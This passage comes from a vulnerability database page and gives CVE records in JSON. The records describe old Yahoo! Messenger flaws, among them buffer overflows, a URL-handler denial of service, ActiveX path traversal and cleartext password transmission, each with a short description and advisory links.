| http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html | mailing-list, x_refsource_FULLDISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/14171 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T00:01:23.619Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
},
{
"name": "10573",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/10573"
},
{
"name": "1008651",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1008651"
},
{
"name": "9383",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/9383"
},
{
"name": "3437",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/3437"
},
{
"name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
},
{
"name": "yahoo-messenger-filename-bo(14171)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2004-01-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-10T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
},
{
"name": "10573",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/10573"
},
{
"name": "1008651",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1008651"
},
{
"name": "9383",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/9383"
},
{
"name": "3437",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/3437"
},
{
"name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
},
{
"name": "yahoo-messenger-filename-bo(14171)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2004-0043",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=107357996802255\u0026w=2"
},
{
"name": "10573",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/10573"
},
{
"name": "1008651",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1008651"
},
{
"name": "9383",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/9383"
},
{
"name": "3437",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/3437"
},
{
"name": "20040108 Yahoo Instant Messenger Long Filename Downloading Buffer Overflow",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-January/015334.html"
},
{
"name": "yahoo-messenger-filename-bo(14171)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14171"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2004-0043",
"datePublished": "2004-01-14T05:00:00",
"dateReserved": "2004-01-08T00:00:00",
"dateUpdated": "2024-08-08T00:01:23.619Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2005-1618 (GCVE-0-2005-1618)
Vulnerability from cvelistv5
Published
2005-05-16 04:00
Modified
2024-08-07 21:59
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an & (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server.
References
| ▼ | URL | Tags |
|---|---|---|
| http://marc.info/?l=bugtraq&m=111601904204055&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securityfocus.com/bid/13626 | vdb-entry, x_refsource_BID | |
| http://www.osvdb.org/16816 | vdb-entry, x_refsource_OSVDB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T21:59:23.506Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20050513 Yahoo! Messenger URL Handler Remote DoS Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
},
{
"name": "13626",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/13626"
},
{
"name": "16816",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/16816"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2005-05-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an \u0026 (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-10-17T13:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20050513 Yahoo! Messenger URL Handler Remote DoS Vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
},
{
"name": "13626",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/13626"
},
{
"name": "16816",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/16816"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-1618",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an \u0026 (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20050513 Yahoo! Messenger URL Handler Remote DoS Vulnerability",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
},
{
"name": "13626",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/13626"
},
{
"name": "16816",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/16816"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-1618",
"datePublished": "2005-05-16T04:00:00",
"dateReserved": "2005-05-16T00:00:00",
"dateUpdated": "2024-08-07T21:59:23.506Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-5017 (GCVE-0-2007-5017)
Vulnerability from cvelistv5
Published
2007-09-20 21:00
Modified
2024-08-07 15:17
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html | x_refsource_MISC | |
| https://www.exploit-db.com/exploits/4428 | exploit, x_refsource_EXPLOIT-DB | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/36694 | vdb-entry, x_refsource_XF | |
| http://osvdb.org/38296 | vdb-entry, x_refsource_OSVDB | |
| http://www.securityfocus.com/bid/25727 | vdb-entry, x_refsource_BID | |
| http://www.securitytracker.com/id?1018715 | vdb-entry, x_refsource_SECTRACK |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T15:17:28.168Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"name": "4428",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"name": "yahoo-messenger-ft60-code-execution(36694)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"name": "38296",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/38296"
},
{
"name": "25727",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25727"
},
{
"name": "1018715",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018715"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-09-19T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-09-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"name": "4428",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"name": "yahoo-messenger-ft60-code-execution(36694)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"name": "38296",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/38296"
},
{
"name": "25727",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25727"
},
{
"name": "1018715",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018715"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-5017",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html",
"refsource": "MISC",
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"name": "4428",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"name": "yahoo-messenger-ft60-code-execution(36694)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"name": "38296",
"refsource": "OSVDB",
"url": "http://osvdb.org/38296"
},
{
"name": "25727",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25727"
},
{
"name": "1018715",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018715"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-5017",
"datePublished": "2007-09-20T21:00:00",
"dateReserved": "2007-09-20T00:00:00",
"dateUpdated": "2024-08-07T15:17:28.168Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2005-0242 (GCVE-0-2005-0242)
Vulnerability from cvelistv5
Published
2005-02-18 05:00
Modified
2024-08-07 21:05
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/11815 | third-party-advisory, x_refsource_SECUNIA | |
| http://secunia.com/secunia_research/2004-6/advisory/ | x_refsource_MISC | |
| http://messenger.yahoo.com/security/update6.html | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T21:05:25.268Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "11815",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/11815"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://secunia.com/secunia_research/2004-6/advisory/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security/update6.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2005-02-18T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-06-15T16:38:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "11815",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/11815"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://secunia.com/secunia_research/2004-6/advisory/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security/update6.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2005-0242",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "11815",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/11815"
},
{
"name": "http://secunia.com/secunia_research/2004-6/advisory/",
"refsource": "MISC",
"url": "http://secunia.com/secunia_research/2004-6/advisory/"
},
{
"name": "http://messenger.yahoo.com/security/update6.html",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security/update6.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2005-0242",
"datePublished": "2005-02-18T05:00:00",
"dateReserved": "2005-02-08T00:00:00",
"dateUpdated": "2024-08-07T21:05:25.268Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-0322 (GCVE-0-2002-0322)
Vulnerability from cvelistv5
Published
2002-05-03 04:00
Modified
2024-08-08 02:42
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing.
References
| ▼ | URL | Tags |
|---|---|---|
| http://marc.info/?l=bugtraq&m=101466489113920&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securityfocus.com/bid/4173 | vdb-entry, x_refsource_BID | |
| http://marc.info/?l=bugtraq&m=101467298107635&w=2 | mailing-list, x_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T02:42:29.243Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20020223 Re: Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
},
{
"name": "4173",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/4173"
},
{
"name": "20020223 Re: Re: Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-02-23T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-10-17T13:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20020223 Re: Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
},
{
"name": "4173",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/4173"
},
{
"name": "20020223 Re: Re: Remote crashes in Yahoo messenger",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-0322",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20020223 Re: Remote crashes in Yahoo messenger",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
},
{
"name": "4173",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/4173"
},
{
"name": "20020223 Re: Re: Remote crashes in Yahoo messenger",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-0322",
"datePublished": "2002-05-03T04:00:00",
"dateReserved": "2002-05-01T00:00:00",
"dateUpdated": "2024-08-08T02:42:29.243Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-0868 (GCVE-0-2007-0868)
Vulnerability from cvelistv5
Published
2007-02-09 19:00
Modified
2024-08-07 12:34
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/22407 | vdb-entry, x_refsource_BID | |
| http://osvdb.org/34696 | vdb-entry, x_refsource_OSVDB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T12:34:21.130Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "22407",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/22407"
},
{
"name": "34696",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/34696"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-02-05T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2008-11-15T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "22407",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/22407"
},
{
"name": "34696",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/34696"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-0868",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "22407",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/22407"
},
{
"name": "34696",
"refsource": "OSVDB",
"url": "http://osvdb.org/34696"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-0868",
"datePublished": "2007-02-09T19:00:00",
"dateReserved": "2007-02-09T00:00:00",
"dateUpdated": "2024-08-07T12:34:21.130Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2003-1135 (GCVE-0-2003-1135)
Vulnerability from cvelistv5
Published
2005-05-10 04:00
Modified
2024-09-16 16:38
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of "%" (percent) characters after the Yahoo ID.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/archive/1/342472 | mailing-list, x_refsource_BUGTRAQ | |
| http://www.securityfocus.com/bid/8894 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T02:19:44.703Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20031026 Buffer Overflow in Yahoo messenger Client",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/342472"
},
{
"name": "8894",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/8894"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of \"%\" (percent) characters after the Yahoo ID."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2005-05-10T04:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20031026 Buffer Overflow in Yahoo messenger Client",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/342472"
},
{
"name": "8894",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/8894"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2003-1135",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
